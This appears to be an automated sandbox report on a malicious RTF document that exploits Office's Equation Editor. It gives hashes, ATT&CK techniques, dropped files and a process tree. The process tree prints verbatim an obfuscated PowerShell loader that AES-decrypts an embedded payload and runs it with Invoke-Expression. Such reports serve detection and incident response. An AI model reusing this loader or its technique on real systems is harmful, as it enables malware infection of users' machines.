8fc89bf19f14cfd251b0023a624d9be2eaf9a41328e7d5c6f1c703fea07c841d

General

Target

e628ee1f2b81b8972f53e2b2785d97a1.rtf
Size

110KB
MD5

e628ee1f2b81b8972f53e2b2785d97a1
SHA1

0fa0fe5809f166d707fdcf3a2a866b92a761a92b
SHA256

8fc89bf19f14cfd251b0023a624d9be2eaf9a41328e7d5c6f1c703fea07c841d
SHA512

cfb5abf034fb4105fa1f5b23f40b3070427bb862c701fab29457caf15f1f100be6103d783380490cf6afddc7291db17a75f6ab1e19a82e2650072a94eebb6093
SSDEEP

768:I6/gj/IOvpQ0dXHynngGCobrwTsiCmWv8E:IV/IWC0diFRbahWkE

Score

8^/10

execution

Malware Config

Signatures

Blocklisted process makes network request 4 IoCs

flow	pid	Process
4	2500	EQNEDT32.EXE
7	2708	WScript.exe
9	2708	WScript.exe
10	2128	powershell.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2128	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Office loads VBA resources, possible macro or embedded object present

Launches Equation Editor 1 TTPs 1 IoCs

Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

exploit

Exploitation for Client Execution

T1203

pid	Process
2500	EQNEDT32.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2088	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2128	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2128	powershell.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
2088	WINWORD.EXE
2088	WINWORD.EXE

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 2500 wrote to memory of 2708	2500	EQNEDT32.EXE	33
PID 2500 wrote to memory of 2708	2500	EQNEDT32.EXE	33
PID 2500 wrote to memory of 2708	2500	EQNEDT32.EXE	33
PID 2500 wrote to memory of 2708	2500	EQNEDT32.EXE	33
PID 2708 wrote to memory of 2128	2708	WScript.exe	35
PID 2708 wrote to memory of 2128	2708	WScript.exe	35
PID 2708 wrote to memory of 2128	2708	WScript.exe	35
PID 2708 wrote to memory of 2128	2708	WScript.exe	35
PID 2088 wrote to memory of 2880	2088	WINWORD.EXE	37
PID 2088 wrote to memory of 2880	2088	WINWORD.EXE	37
PID 2088 wrote to memory of 2880	2088	WINWORD.EXE	37
PID 2088 wrote to memory of 2880	2088	WINWORD.EXE	37

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\e628ee1f2b81b8972f53e2b2785d97a1.rtf"
1⤵
- Drops file in Windows directory
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2088
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:2880

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
1⤵
- Blocklisted process makes network request
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:2500
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\simplethingstohappenedarething.vBS"
  2⤵
  - Blocklisted process makes network request
  - Suspicious use of WriteProcessMemory
  PID:2708
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI00669725676900661955908584003901CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnI6WdXDNL1QOiTNMpTmj3GP4fuhNEJiNeCYvt+bi9HmaeB+pnzXo0qd3bcCYQwOu26eR2WeL4DLDIoGpCtWrOc3+IDX1Zg1T8lQ87otzzWi+T/L0YPQop+bdw0lY34zryaUifKKDho7O3XAiN5Ag419Dmmeg6FoljemPC/VzaixMzAMGup3hIrL3W90fn7WPFXxNie5Kx1h/OVwYAPqAjt9JkXqX9pbQ8qBPG0Ld8UXKhyyvpnjHr7xbxc/lTGHhyb4O688cdVijjodbdyQvGipBWexdYqjMGvEKkJjIGNV/BdF0foq1Ap3jVAC98mohO7essgjuBtNPtWpwRZHSE0i0ZsQaQ9Ug7cAy5hUChH2uM74rBm+jzd7LXuICbKcNnIY+jOSzeU5ONhicSfpfceKi7ve7gq6922dRWEH5ZMi5PBuhDsZczV74Zr433TL6xRqUg9L9ik5AGPow6bOVE0NZ4/YyzxnXA4tFi+ye8pfPGi1HQ620JFmMlW/c48T6feiLN5jNd8rfxBpSGogQ9RigX9171GY+bMOp0DrmFGnapeguEsSjUysn2kNWx+mSqYYfid6qe5AYvmQWBFSoQMgMO1hPOPkq3+PQilJe+Rn3pq2DZvdUFJY7g04so1tpE4rSIoLYQkcAVoy7zeO/lhOPKETIcY8t6uxGzQFzddMK7RjWzt5OxszXtRmFWRcMMaHM9bB8+3yalrRMMCGsN2NcxqSWkemfeWMMpFrvSi9naLZaW3pjU3mUhnCeSdE8WT3YjSUOhm1aE9zFfB3MDUAqB0WNmkRU9uqU4vxdt8AzP+HoBMAbAwOcWYi/24xV3Z8UTWLXZiwie9jAU0JR0b7n5PogpmxGVPm4t41EjfVWW/MH++PdCq34Vso1KgxJYI6f3oiq26sk4bl5WHvf76uN4aStUk2nQDZEza1bQoAH0IcePgM//31NdQEwyTgU0U9LtqDJdG/4OR1wqXv0l0m7nlkObWp0TGmljp4c0shQ27F4EwDqzXpAMUwzMaDQ+Qt4SqT6m5p8bjU0PrVxspYd/zZtwpNb56tHebQmw93+yZrXvMleQMIRvz7AJOBNZSQUTNq66mmQcoqgA698P+3dbTO3NkxSGI8E/yFdDuOH/LgPcl2hp1jYapVtcegTW1zXuwTs4CITWZF9XAJY/GFglyMPJ1v9ftJ02v7AP8oO6lTN9ESbYYGG4h2UXbk5fqq3o8f3L+ppiVEpxFnqQmbp4UPGq2eR4+ZhHUNAg9DI7b2lGUjZqgl65aFyOCJXVZDG1Gb/Um9HGgVH3jjRRrBzAmSVpcyMSPW+jcD8Ju624QnIjGeV0yHL7g+dzDK/hBBnfcQ2/3GRGFPucwKg10578K0dCz6plSdfhxEQpEndVv1aCVKZXmRLr39XRYMMD9zYJ6QuDUZGGLxN46AqhiaQ==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')
    3⤵
    - Blocklisted process makes network request
    - Drops file in System32 directory
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2128

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Exploitation for Client Execution

1

T1203

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NT8UAXPK\paste1[1].txt

Filesize
156B

MD5
ad6c37ef980373e9bcbd14810fad34bc

SHA1
9c061a1b3608b7c7f1db7cd06c8246913ee11bda

SHA256
ee85057c1a562fc405d03b2b6a651612ac688dff5c9eeae88a0c1e34e17c602c

SHA512
30dc26060efcb4fd44be2d74cc4d33654ee0eb9039bd933c80b67afcc938bdba458cfa6bfc43d2ddb2f59dd6f9ddfe66951c56c61709a2dc02eac94e0e2ae97f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

Filesize
19KB

MD5
a75a762391d1af754346fddb10db3eac

SHA1
19031c985ede96a02d3ddeb813cfcff531e33937

SHA256
2f4a0ca8147e2d0644ede162eef4315c71a6c0f2b9605b8a5331c2bde9fddab6

SHA512
6a522f67bfa5384746cae0d29dd3abcf3866d002b351993e16f11baa0603afdebf352450d7dcf5a0ad2d314e3ed6247978f11ca4d96df42bf2b0c1d2441b4fa3

Download Submit
C:\Users\Admin\AppData\Roaming\simplethingstohappenedarething.vBS

Filesize
54KB

MD5
cfbf2e7faea58e9249d4e5f6520851a2

SHA1
b27795e6e6282d7d3888ab39f77ad314139497fc

SHA256
89c3771f859200a6c3e2d7aea98d0e4c2c21741d9d2117e47dfc2849523be39a

SHA512
c5e71d2cd63debf13c2c57807aaeb819f2077423c8ce86770c7d803054fa9f02304fff646ea8f018198089ac2ca1d565a2faab93916be86ff357c6c529e5c164

Download Submit
memory/2088-0-0x000000002FF91000-0x000000002FF92000-memory.dmp

Filesize
4KB

Download
memory/2088-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2088-2-0x000000007181D000-0x0000000071828000-memory.dmp

Filesize
44KB

Download
memory/2088-32-0x000000007181D000-0x0000000071828000-memory.dmp

Filesize
44KB

Download
memory/2088-50-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download

Analysis

Sharing